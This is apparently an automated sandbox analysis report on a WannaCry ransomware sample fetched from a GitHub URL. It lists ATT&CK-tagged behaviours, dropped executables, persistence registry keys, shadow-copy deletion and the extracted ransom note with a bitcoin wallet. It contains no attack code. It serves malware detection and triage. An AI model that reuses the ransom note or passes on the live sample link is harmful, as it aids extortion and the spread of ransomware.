wannacry | hxxps://github[.]com/limiteci/WannaCry/blob/main/WannaCry[.]EXE?raw=true

Analysis

max time kernel
446s
max time network
446s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
21-04-2024 15:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/limiteci/WannaCry/blob/main/WannaCry.EXE?raw=true

Score

10^/10

wannacry discovery persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@Please_Read_Me@.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Downloads MZ/PE file

Drops startup file 2 IoCs

Processes:

WannaCry.EXE

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD260E.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD2615.tmp	WannaCry.EXE

Executes dropped EXE 56 IoCs

Processes:

WannaCry.EXEtaskdl.exeWannaCry.EXE@WanaDecryptor@.exe@WanaDecryptor@.exetaskhsvc.exeWannaCry.EXEWannaCry.EXEWannaCry.EXEWannaCry.EXEWannaCry.EXEWannaCry.EXEWannaCry.EXEWannaCry.EXEWannaCry.EXEtaskdl.exeWannaCry.EXEtaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exe@WanaDecryptor@.exetaskse.exetaskdl.exe@WanaDecryptor@.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exetaskse.exe@WanaDecryptor@.exetaskdl.exe

pid	process
5892	WannaCry.EXE
64	taskdl.exe
5728	WannaCry.EXE
4644	@WanaDecryptor@.exe
3340	@WanaDecryptor@.exe
3272	taskhsvc.exe
5588	WannaCry.EXE
3428	WannaCry.EXE
4780	WannaCry.EXE
6000	WannaCry.EXE
4324	WannaCry.EXE
3892	WannaCry.EXE
600	WannaCry.EXE
5804	WannaCry.EXE
4708	WannaCry.EXE
5684	taskdl.exe
3732	WannaCry.EXE
5480	taskse.exe
2792	@WanaDecryptor@.exe
4732	taskdl.exe
3760	taskse.exe
4876	@WanaDecryptor@.exe
5344	taskdl.exe
3980	taskse.exe
5452	@WanaDecryptor@.exe
5984	@WanaDecryptor@.exe
2764	taskse.exe
5428	taskdl.exe
3760	@WanaDecryptor@.exe
2680	taskse.exe
404	@WanaDecryptor@.exe
4208	taskdl.exe
3980	taskse.exe
5868	@WanaDecryptor@.exe
2056	taskdl.exe
3556	taskse.exe
2808	@WanaDecryptor@.exe
4540	taskdl.exe
5512	taskse.exe
6120	@WanaDecryptor@.exe
848	taskdl.exe
5680	taskse.exe
4112	@WanaDecryptor@.exe
4540	taskdl.exe
3740	taskse.exe
5716	@WanaDecryptor@.exe
4540	taskdl.exe
5160	taskse.exe
876	@WanaDecryptor@.exe
4680	taskdl.exe
5068	taskse.exe
5652	@WanaDecryptor@.exe
548	taskdl.exe
2164	taskse.exe
5776	@WanaDecryptor@.exe
396	taskdl.exe

Loads dropped DLL 7 IoCs

Processes:

taskhsvc.exe

pid process

3272 taskhsvc.exe
3272 taskhsvc.exe
3272 taskhsvc.exe
3272 taskhsvc.exe
3272 taskhsvc.exe
3272 taskhsvc.exe
3272 taskhsvc.exe

pid	process
3272	taskhsvc.exe
3272	taskhsvc.exe
3272	taskhsvc.exe
3272	taskhsvc.exe
3272	taskhsvc.exe
3272	taskhsvc.exe
3272	taskhsvc.exe

Modifies file permissions 1 TTPs 12 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
6064	icacls.exe
6068	icacls.exe
1916	icacls.exe
5508	icacls.exe
3980	icacls.exe
3456	icacls.exe
5964	icacls.exe
2680	icacls.exe
1448	icacls.exe
3920	icacls.exe
5524	icacls.exe
212	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rgrqlfvlnbfubm184 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

28 raw.githubusercontent.com
29 raw.githubusercontent.com

flow	ioc
28	raw.githubusercontent.com
29	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

WannaCry.EXE@WanaDecryptor@.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp"	WannaCry.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp"	@WanaDecryptor@.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 31 IoCs

Processes:

msedge.exemsedge.exeOpenWith.exemsedge.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 8400310000000000955857791300444f574e4c4f7e3100006c0009000400efbe8c58e15b955860792e0000007de1010000000100000000000000000042000000000030ed570044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7800310000000000955851791100557365727300640009000400efbe874f7748955851792e000000c70500000000010000000000000000003a000000000098a78f0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 500031000000000095585179100041646d696e003c0009000400efbe8c58e15b955851792e00000075e1010000000100000000000000000000000000000098a78f00410064006d0069006e00000014000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1132431369-515282257-1998160155-1000\{81DE0F3A-170A-45CB-B782-8957E0EEF7FC}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\NodeSlot = "1"	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1132431369-515282257-1998160155-1000\{6FC21980-0065-4523-82F8-16EF7FC2C333}	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3360 reg.exe

pid	process
3360	reg.exe

NTFS ADS 2 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 328287.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 368668.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

5436 NOTEPAD.EXE

pid	process
5436	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exetaskhsvc.exechrome.exemsedge.exemsedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exewanakiwi.exe

pid	process
2008	msedge.exe
2008	msedge.exe
3860	msedge.exe
3860	msedge.exe
1240	identity_helper.exe
1240	identity_helper.exe
1576	msedge.exe
1576	msedge.exe
3272	taskhsvc.exe
3272	taskhsvc.exe
3272	taskhsvc.exe
3272	taskhsvc.exe
3272	taskhsvc.exe
3272	taskhsvc.exe
5504	chrome.exe
5504	chrome.exe
5228	msedge.exe
5228	msedge.exe
5452	msedge.exe
5452	msedge.exe
5452	msedge.exe
5452	msedge.exe
2352	msedge.exe
2352	msedge.exe
684	msedge.exe
684	msedge.exe
4252	identity_helper.exe
4252	identity_helper.exe
764	msedge.exe
764	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
2420	msedge.exe
2420	msedge.exe
4520	msedge.exe
4520	msedge.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe
6136	wanakiwi.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

@WanaDecryptor@.exeOpenWith.exe

pid process

2792 @WanaDecryptor@.exe
2204 OpenWith.exe

pid	process
2792	@WanaDecryptor@.exe
2204	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 39 IoCs

Processes:

msedge.exechrome.exemsedge.exe

pid	process
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exevssvc.exetaskse.exechrome.exetaskse.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	6108	WMIC.exe
Token: SeSecurityPrivilege	6108	WMIC.exe
Token: SeTakeOwnershipPrivilege	6108	WMIC.exe
Token: SeLoadDriverPrivilege	6108	WMIC.exe
Token: SeSystemProfilePrivilege	6108	WMIC.exe
Token: SeSystemtimePrivilege	6108	WMIC.exe
Token: SeProfSingleProcessPrivilege	6108	WMIC.exe
Token: SeIncBasePriorityPrivilege	6108	WMIC.exe
Token: SeCreatePagefilePrivilege	6108	WMIC.exe
Token: SeBackupPrivilege	6108	WMIC.exe
Token: SeRestorePrivilege	6108	WMIC.exe
Token: SeShutdownPrivilege	6108	WMIC.exe
Token: SeDebugPrivilege	6108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6108	WMIC.exe
Token: SeRemoteShutdownPrivilege	6108	WMIC.exe
Token: SeUndockPrivilege	6108	WMIC.exe
Token: SeManageVolumePrivilege	6108	WMIC.exe
Token: 33	6108	WMIC.exe
Token: 34	6108	WMIC.exe
Token: 35	6108	WMIC.exe
Token: 36	6108	WMIC.exe
Token: SeIncreaseQuotaPrivilege	6108	WMIC.exe
Token: SeSecurityPrivilege	6108	WMIC.exe
Token: SeTakeOwnershipPrivilege	6108	WMIC.exe
Token: SeLoadDriverPrivilege	6108	WMIC.exe
Token: SeSystemProfilePrivilege	6108	WMIC.exe
Token: SeSystemtimePrivilege	6108	WMIC.exe
Token: SeProfSingleProcessPrivilege	6108	WMIC.exe
Token: SeIncBasePriorityPrivilege	6108	WMIC.exe
Token: SeCreatePagefilePrivilege	6108	WMIC.exe
Token: SeBackupPrivilege	6108	WMIC.exe
Token: SeRestorePrivilege	6108	WMIC.exe
Token: SeShutdownPrivilege	6108	WMIC.exe
Token: SeDebugPrivilege	6108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6108	WMIC.exe
Token: SeRemoteShutdownPrivilege	6108	WMIC.exe
Token: SeUndockPrivilege	6108	WMIC.exe
Token: SeManageVolumePrivilege	6108	WMIC.exe
Token: 33	6108	WMIC.exe
Token: 34	6108	WMIC.exe
Token: 35	6108	WMIC.exe
Token: 36	6108	WMIC.exe
Token: SeBackupPrivilege	6052	vssvc.exe
Token: SeRestorePrivilege	6052	vssvc.exe
Token: SeAuditPrivilege	6052	vssvc.exe
Token: SeTcbPrivilege	5480	taskse.exe
Token: SeTcbPrivilege	5480	taskse.exe
Token: SeShutdownPrivilege	5504	chrome.exe
Token: SeCreatePagefilePrivilege	5504	chrome.exe
Token: SeShutdownPrivilege	5504	chrome.exe
Token: SeCreatePagefilePrivilege	5504	chrome.exe
Token: SeShutdownPrivilege	5504	chrome.exe
Token: SeCreatePagefilePrivilege	5504	chrome.exe
Token: SeShutdownPrivilege	5504	chrome.exe
Token: SeCreatePagefilePrivilege	5504	chrome.exe
Token: SeShutdownPrivilege	5504	chrome.exe
Token: SeCreatePagefilePrivilege	5504	chrome.exe
Token: SeTcbPrivilege	3760	taskse.exe
Token: SeTcbPrivilege	3760	taskse.exe
Token: SeShutdownPrivilege	5504	chrome.exe
Token: SeCreatePagefilePrivilege	5504	chrome.exe
Token: SeShutdownPrivilege	5504	chrome.exe
Token: SeCreatePagefilePrivilege	5504	chrome.exe
Token: SeShutdownPrivilege	5504	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

msedge.exechrome.exemsedge.exe

pid	process
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
5504	chrome.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe
684	msedge.exe

Suspicious use of SetWindowsHookEx 36 IoCs

Processes:

@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exe@WanaDecryptor@.exeOpenWith.exe@WanaDecryptor@.exe@WanaDecryptor@.exe

pid	process
4644	@WanaDecryptor@.exe
4644	@WanaDecryptor@.exe
3340	@WanaDecryptor@.exe
3340	@WanaDecryptor@.exe
2792	@WanaDecryptor@.exe
2792	@WanaDecryptor@.exe
4876	@WanaDecryptor@.exe
5452	@WanaDecryptor@.exe
5984	@WanaDecryptor@.exe
3760	@WanaDecryptor@.exe
404	@WanaDecryptor@.exe
5868	@WanaDecryptor@.exe
2808	@WanaDecryptor@.exe
6120	@WanaDecryptor@.exe
4112	@WanaDecryptor@.exe
5716	@WanaDecryptor@.exe
876	@WanaDecryptor@.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
2204	OpenWith.exe
5652	@WanaDecryptor@.exe
5776	@WanaDecryptor@.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 3860 wrote to memory of 4996	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 4996	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2776	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2008	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 2008	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 5076	3860	msedge.exe	msedge.exe
